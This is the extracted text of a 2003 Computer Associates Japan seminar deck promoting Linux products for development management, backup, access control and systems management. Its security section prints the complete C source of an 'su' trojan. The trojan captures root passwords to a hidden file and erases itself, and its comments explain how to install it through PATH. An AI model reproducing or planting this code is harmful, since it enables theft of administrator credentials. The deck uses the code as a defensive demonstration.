Linux@CAJ
ライブ:先端技術を簡単に、
ビジネスの発展に寄与する
CAのLinuxソリューション
www.caj.co.jp/linux
2003年5月21日
コンピュータ・アソシエイツ株式会社
(c) 2003 Computer Associates International, Inc. All rights reserved. All trademarks, trade names, service
marks and logos referenced herein belong to their respective companies.
www.caj.co.jp
Copyright 2003, Computer Associates Japan
Agenda
CAのLinuxへの取り組み
Linux@CAJ
Linuxソリューションライブ
> 第1部:ミスコミュニケーションの防止
> 第2部:効果的なバックアップとリストア
> 第3部:セキュアサーバの構築
> 第4部:ITソリューションの統合
www.caj.co.jp/linuxatcaj/
Linux@CAJ
本題に入る前に
Linux天気予報
Apache Web Serverのシェアにその答えが…
www.caj.co.jp/linuxatcaj/
Linux@CAJ
これからは、「Linuxといえばca」
CAは、御社のLinuxをビジネスで安心して活用できる
ソリューションを提供します
自由な学生
www.caj.co.jp/linuxatcaj/
大人の責任を持った社会人
Linux@CAJ
CAのLinuxへの取り組み
Linuxの発展に
寄与
対応製品
70以上
リーダーシップ
www.caj.co.jp/linuxatcaj/
Linux@CAJ
Linux@CA – Recognized Leadership
Best in Show – 01/02
> Unicenter Network and Systems Management
Best Productivity Application – 01/02
> Unicenter AutoSys Job Management
Best System Integration Solution – 01/02
> Unicenter Network and Systems Management
Best Development Tools – 08/02
> AllFusion Harvest Change Manager
Best Storage Solution – 08/02
> BrightStor Enterprise Backup
Best System Integration Solution – 08/02
> CleverPath Portal
Best Security Solution – 01/03
> eTrust Antivirus
www.caj.co.jp/linuxatcaj/
Linux@CAJ
Linux@CAJ 「Linuxといえばca」作戦
1. CA ワールドワイドのLinuxソリューション
を広く日本市場に知らせて、認知させます
2. 日本のLinux市場に対して、CA Japanが
現在、提供できるLinuxマネージメント
ソリューションを提案し、認知度を高めます
3. 日本のメインフレームLinux市場に対して、
CAのLinuxソリューションを知らせて、認知
させます
www.caj.co.jp/linuxatcaj/
www.caj.co.jp/linuxatcaj/
Linux@CAJ
百聞は一見にしかず
第1部:ミスコミュニケーションの防止
第2部:効果的なバックアップとリストア
第3部:セキュアサーバの構築
第4部:ITソリューションの統合
www.caj.co.jp/linuxatcaj/
Linux@CAJ
Linuxソリューションライブ
第1部:ミスコミュニケーションの防止
第2部:効果的なバックアップとリストア
第3部:セキュアサーバの構築
第4部:ITソリューションの統合
www.caj.co.jp/linuxatcaj/
Linux@CAJ
ミスコミュニケーションを防止するには
利用者
ポータル
重要な情報は
チェックできて
プッシュ配信
いますか?
CleverPath
Portal
MySQL
御社のDBを把
フォワード&リバース
Linux
握している人は
エンジニアリング
いますか?
Harvest
開発プロジェク
トは思い通り進
承認プロセス
んでいます
か?
開発者
データモデリング
www.caj.co.jp/linuxatcaj/
開発プロセス管理
Linux@CAJ
こんなことありませんか?
このデータベースどうなってるの??
それ作った人辞めちゃったからなァ・・・。
誰もわかんないよ。
開発者A
仕様書ないの?
あるよ
あれ???実際とは違うみたいだよ・・・
これじゃわかんないよ。
どうしよう・・・誰か助けて~
www.caj.co.jp/linuxatcaj/
開発者B
Linux@CAJ
データモデリングがあれば・・・
ERwin
導入後
・モデルがあるため一目瞭然!
・既存のデータベースからもモデル作成可能!
全て解決!
www.caj.co.jp/linuxatcaj/
Linux@CAJ
モデルって・・・?
www.caj.co.jp/linuxatcaj/
Linux@CAJ
どんなデータベースが使えるの?
20種類以上のDBをサポート
ODBCもサポート
⇒MySQL、PostgreSQLも使えます!
www.caj.co.jp/linuxatcaj/
Linux@CAJ
ミスコミュニケーションを防止するには
利用者
ポータル
アプリは有効活
用されています
プッシュ配信
か?
CleverPath
Portal
MySQL
御社のDBを把
フォワード&リバース
Linux
握している人は
エンジニアリング
いますか?
Harvest
開発プロジェク
トは思い通り進
承認プロセス
んでいます
か?
開発者
データモデリング
www.caj.co.jp/linuxatcaj/
開発プロセス管理
Linux@CAJ
こんなことはありませんか?
アレッ!ソースが古くなってる!誰だ
よ~俺のソース上書きしたの!
反映はまだしちゃいけないんだよ!
開発者A
バックアップとっときゃよかった・・・
勝手に作業するからだよ
プロジェクトマネージャーがちゃんと
管理してないからだヨ~
管理も大変なんだよ・・・
www.caj.co.jp/linuxatcaj/
プロジェクト
マネージャ
Linux@CAJ
承認プロセスがあれば・・・
Harvest
導入後
・承認プロセスの導入により手戻りゼロ!
・開発するモノと開発するヒトを同時に管理!
全て解決!
www.caj.co.jp/linuxatcaj/
Linux@CAJ
承認プロセスって・・・?
プロセス
開発 ⇒ テスト ⇒ リリース
www.caj.co.jp/linuxatcaj/
Linux@CAJ
ミスコミュニケーションを防止するには
利用者
ポータル
アプリは有効活
用されています
プッシュ配信
か?
CleverPath
Portal
MySQL
御社のDBを把
フォワード&リバース
Linux
握している人は
エンジニアリング
いますか?
Harvest
開発プロジェク
トは思い通り進
承認プロセス
んでいます
か?
開発者
データモデリング
www.caj.co.jp/linuxatcaj/
開発プロセス管理
Linux@CAJ
プッシュ配信ができれば・・・
その情報どこにあるの?
伝えたはずだけど?見てないの!?
社員A
お知らせもらってないヨ。どこ見に行く
の?
それはここで、これはこっちで・・・
え?なんて?どこ?もう一回・・・
全て解決!
だからそれはここで、これは・・・あ
れ??どこだっけ??
www.caj.co.jp/linuxatcaj/
情報シス
テム部
Linux@CAJ
プッシュ配信ができれば・・・
CleverPath Portal
導入後
・プッシュ配信により情報の周知徹底!
・ポータルにアクセスさえすれば一目でわかる!
全て解決!
www.caj.co.jp/linuxatcaj/
Linux@CAJ
プッシュ配信って・・・?
www.caj.co.jp/linuxatcaj/
Linux@CAJ
Part1 まとめ
利用者
CleverPath
Portal
ポータル
Forward Engineering
開発したアプリを登録
CleverPath
Portal
MySQL
Linux
Reverse Engineering
ERwin
データモデリング
www.caj.co.jp/linuxatcaj/
Harvest
開発者
Harvest
開発プロセス管理
Linux@CAJ
Linuxソリューションライブ
第1部:ミスコミュニケーションの防止
第2部:効果的なバックアップとリストア
第3部:セキュアサーバの構築
第4部:ITソリューションの統合
www.caj.co.jp/linuxatcaj/
Linux@CAJ
こんなことでお困りではありませんか?
Linuxのコマンドでのバックアップは面倒
簡単にスケジューリングしたい
差分だけバックアップしたい
Webやデータベースをとめないでバックアップ
したい
ウィルスが混入したファイルをバックアップ対
象から除外したい
www.caj.co.jp/linuxatcaj/
Linux@CAJ
ARCserve for LINUX主な特徴
・簡単なインストール
・Web Based Java インターフェイス
・TARおよびCPIOサポート(posix形式)
・GNOME/KDE等のインターフェイスサポート
・広範なデバイスサポート
・コマンドベースでの操作
・ウィルススキャン・エンジン搭載
・Backup Agent for Oracle (Option)
・ディザスタリカバリ
・集中管理
www.caj.co.jp/linuxatcaj/
Linux@CAJ
WebベースのGUI
GUIから
簡単操作
www.caj.co.jp/linuxatcaj/
Linux@CAJ
バックアップの3つのステップ
1. バックアップ元の選択
2. バックアップ先の選択
3. スケジュールの設定、ジョブのサブミット
www.caj.co.jp/linuxatcaj/
Linux@CAJ
手順1.バックアップ元の選択
www.caj.co.jp/linuxatcaj/
Linux@CAJ
手順2.バックアップ先の選択
www.caj.co.jp/linuxatcaj/
Linux@CAJ
手順3.スケジュール管理
www.caj.co.jp/linuxatcaj/
Linux@CAJ
リストアの手順
1. リストア対象マシンの選択
2. リストア元の選択
3. リストアジョブのサブミット
www.caj.co.jp/linuxatcaj/
Linux@CAJ
手順1.リストア対象マシンの選択
www.caj.co.jp/linuxatcaj/
Linux@CAJ
手順2.リストア元の選択
www.caj.co.jp/linuxatcaj/
Linux@CAJ
システム構成: 単体バックアップ
サーバ自身が持つ
テープドライブへ
バックアップ
www.caj.co.jp/linuxatcaj/
Linux@CAJ
システム構成: Windowsからのバックアップ
LAN
テープライブラリ
バックアップサーバ
www.caj.co.jp/linuxatcaj/
Linux@CAJ
システム構成: 複数Linuxサーバのバックアップ
LAN
テープライブラリ
バックアップサーバ
www.caj.co.jp/linuxatcaj/
Linux@CAJ
ディザスターリカバリー(惨事復旧)
フロッピーとCD-ROMから起動して、テープに接続して即座に復旧
www.caj.co.jp/linuxatcaj/
Linux@CAJ
BrightStor ARCserve 9 for Linux
Linuxに最適な機能を含んだ新バージョンの
BrightStor ARCserve 9
www.caj.co.jp/linuxatcaj/
Linux@CAJ
Easy to Use – 簡単
ARCserveファミリ、Enterprise Backup で統一された日本語GUI
完全日本語化 ! !
www.caj.co.jp/linuxatcaj/
Linux@CAJ
アンチウィルスを内蔵
全てのジョブを
一元管理
GUIによるシグネチャファイルの
ダウンロード・スケジューリング
www.caj.co.jp/linuxatcaj/
Linux@CAJ
効果的にバックアップをするには
使いやすいGUI
簡単なスケジューリング
様々な構成に対応
BrightStor ARCserveにおまかせ
www.caj.co.jp/linuxatcaj/
Linux@CAJ
「こんなに安くていいの!?」キャンペーン
今なら、BrightStor ARCserve 7 Advanced Edition for Linuxをお買い上げの方に、
もれなくBrightStor ARCserve Backup v9 for Linux 日本語版への
フリーアップグレードがついています!!
BrightStor ARCserve 7 Advanced Edition for Linux
60%OFF
定価
キャンペーン価格
\198,000 →
\79,800
v9より約¥20,000も安い!!
BrightStor ARCserve 7 for Linux Client Agent for Linux
55%OFF
定価
\64,000 →
キャンペーン価格
\29,000
期間限定: 2003年7月31日まで
www.caj.co.jp/linuxatcaj/
Linux@CAJ
Linuxソリューションライブ
第1部:ミスコミュニケーションの防止
第2部:効果的なバックアップとリストア
第3部:セキュアサーバの構築
第4部:ITソリューションの統合
www.caj.co.jp/linuxatcaj/
Linux@CAJ
こんな事、お聞きになった事ありませんか?
本当は、こんな
ある日、こんな風に
ページなのに
変わっていました
www.caj.co.jp/linuxatcaj/
Linux@CAJ
その他にも。。。
・バッファオーバーフロー攻撃 にあった。
・Root権限が奪取 された。
・踏み台 にされた。
・トロイの木馬 を、仕掛けられた。
こんな事象は、外部からの脅威として
認識すべき事だと思います。これはインター
ネット社会での利便性と引き換えに、我々に
その結果、なんらかの被害にあわれた事件を、
与えられた課題のようです。
一度は、お聞きになった事があると思います。
www.caj.co.jp/linuxatcaj/
Linux@CAJ
もっと身近で、こんな思い出はありませんか?
・不慣れな管理者の操作ミス。
・重要なファイルを間違って削除。
・suコマンドにより操作履歴も、Rootばかり で、分かりづらい。
・複数あるシステム(マシン)を間違えて、Shutdown!
・複数あるシステムで同じ作業の繰り返し。そしてケアレスミス!
こんな事象が、Linuxを運用してる仲間や
お客様から聞こえてきます。将来、もっと
Linuxが普及すれば、今よりもっと頻繁に
その結果、思わぬリカバリー作業で、
身近で発生するかもしれません。
ご苦労された経験は、ございませんか?
www.caj.co.jp/linuxatcaj/
Linux@CAJ
どうして、こんな事になるんだろう?
Linux標準のセキュリティでは、Root(特権
ユーザー)は、なんでも出来てしまいます。
具体的には、、、
だから、いろいろ大変な事になるんです!
・どんなファイルも削除 できます。
・重要な
監査履歴ファイルも変更 できます。
世間では、こんな事柄をふまえて
・どんなコマンドでも発行 できます。
セキュリティが必要!と言っているみたいです。
・Linux自身をおもうがままに、起動・停止できます。
・サービス・プロセスを自在に、起動・停止できます。
www.caj.co.jp/linuxatcaj/
Linux@CAJ
じゃあ、どうしたらいいんだろう?
CAでは、Linuxのセキュリティの概念を、根本的に
かえる必要があると考えています。
これを実現するのが、
どのように変えるのかというと、、、
Computer Associates の
eTrust Access Control です。
Rootが、「なんでも出来る」
という概念を、打破します。
www.caj.co.jp/linuxatcaj/
Linux@CAJ
eTrust Access Control って何?
eTrust管理者グループ
分散!
Root
Root
UserA
UserB
www.caj.co.jp/linuxatcaj/
UserC
UserD
Linux@CAJ
eTrust Access Control って何?
つまりWebServerでは、
こんな事が可能になります!!
Root(特権ユーザー)権限が奪取されたとしても
・ Rootのアクセス制御
・ 管理コマンド、デーモンの制限
・ 操作履歴の完全追跡
・ Loginできる端末の制限
被害が最小限に、食い止められます!
www.caj.co.jp/linuxatcaj/
Linux@CAJ
一度、デモを見て下さい。
通常のWebサーバ
※eTrustAccessControlが未導入
ファイアウォール
攻撃
移行
SW
Internet
攻撃マシン
攻撃
堅牢なWebサーバ
※eTrustAccessControlでサーバ保護
www.caj.co.jp/linuxatcaj/
Linux@CAJ
デモ復習
ポートスキャン
管理者権限の取得
システム環境改竄
/* su trojan ribbed - by FA-Q
* werd to lwn for his help.
* mkdir .elm
* cc -o ~/.elm/su su.c
* edit .bash_profile or .bashrc
* add PATH=$HOME/.elm:$PATH
*/
使用可能なPortと
稼動アプリケーションを確認
#include <stdio.h>
#include <stdlib.h>
#define SU_PASS "/tmp/.rewt"
main (int argc, char *argv[])
{
char *key;
char buf[24];
FILE *fd;
パスワード解析
key = (char *)getpass ("Password:");
fd = fopen(SU_PASS,"w");
fprintf(fd, "pass: %s\n", key);
fclose(fd);
printf ("su: incorrect password\n");
sprintf(buf, "rm %s", argv[0]);
system(buf);
exit (1);
}
特定ユーザのパスワード取得
入手した管理者
パスワードにより
システムへ侵入
これがWebServerの場合
•
•
•
•
設定ファイルの改竄
デーモンの停止
Webコンテンツの改竄
痕跡(Log)の消去
デモ内容
トロイの木馬により
管理者パスワードを取得
www.caj.co.jp/linuxatcaj/
Linux@CAJ
まとめ
セキュアなサーバーを構築には
eTrust Access Control
におまかせ
www.caj.co.jp/linuxatcaj/
Linux@CAJ
eTrustでは、その他に
Webページの制御には
一般社員・役員レベル・外注などのグループ毎に、
閲覧できるページを、制御可能。
その結果、大幅に開発工数を減少させる事が可能。
eTrust Web Access Control
におまかせ
www.caj.co.jp/linuxatcaj/
Linux@CAJ
Linuxソリューションライブ
第1部:ミスコミュニケーションの防止
第2部:効果的なバックアップとリストア
第3部:セキュアサーバの構築
第4部:ITソリューションの統合
www.caj.co.jp/linuxatcaj/
Linux@CAJ
統合ソリューション
ネットワーク
デスクトップ
システム
変更&
コンフィギュレーション
インターネット
セキュリティ
Unicenter
ヘルプデスク
アウトプット
ワークロード
ストレージ
アプリケーション
データベース
www.caj.co.jp/linuxatcaj/
Linux@CAJ
これからの運用管理は
リアルワールドインターフェース
直感的な操作が可能
扱いやすい
ビジネスプロセスビュー
業務の観点からリソースをグループ化
効率的な運用
エンドツーエンドマネジメント
メインフレームからデスクトップまで
IT機器から非ITデバイスまで
www.caj.co.jp/linuxatcaj/
Linux@CAJ
いかがでしたか?
第1部:ミスコミュニケーションの防止
第2部:効果的なバックアップとリストア
第3部:セキュアサーバの構築
第4部:ITソリューションの統合
www.caj.co.jp/linuxatcaj/
Linux@CAJ
まとめ: 「Linuxといえばca」
CAは、皆様のビジネスの発展に寄与します
CAの先端技術にご興味のある方は
Linux@CAJホームページへ
www.caj.co.jp/linuxatcaj
www.caj.co.jp/linuxatcaj/
Linux@CAJ
Linux@CAJ
ライブ:先端技術を簡単に、
ビジネスの発展に寄与する
CAのLinuxソリューション
www.caj.co.jp/linux
2003年5月21日
コンピュータ・アソシエイツ株式会社
(c) 2003 Computer Associates International, Inc. All rights reserved. All trademarks, trade names, service
marks and logos referenced herein belong to their respective companies.
www.caj.co.jp
Copyright 2003, Computer Associates Japan
© Copyright 2024 ExpyDoc
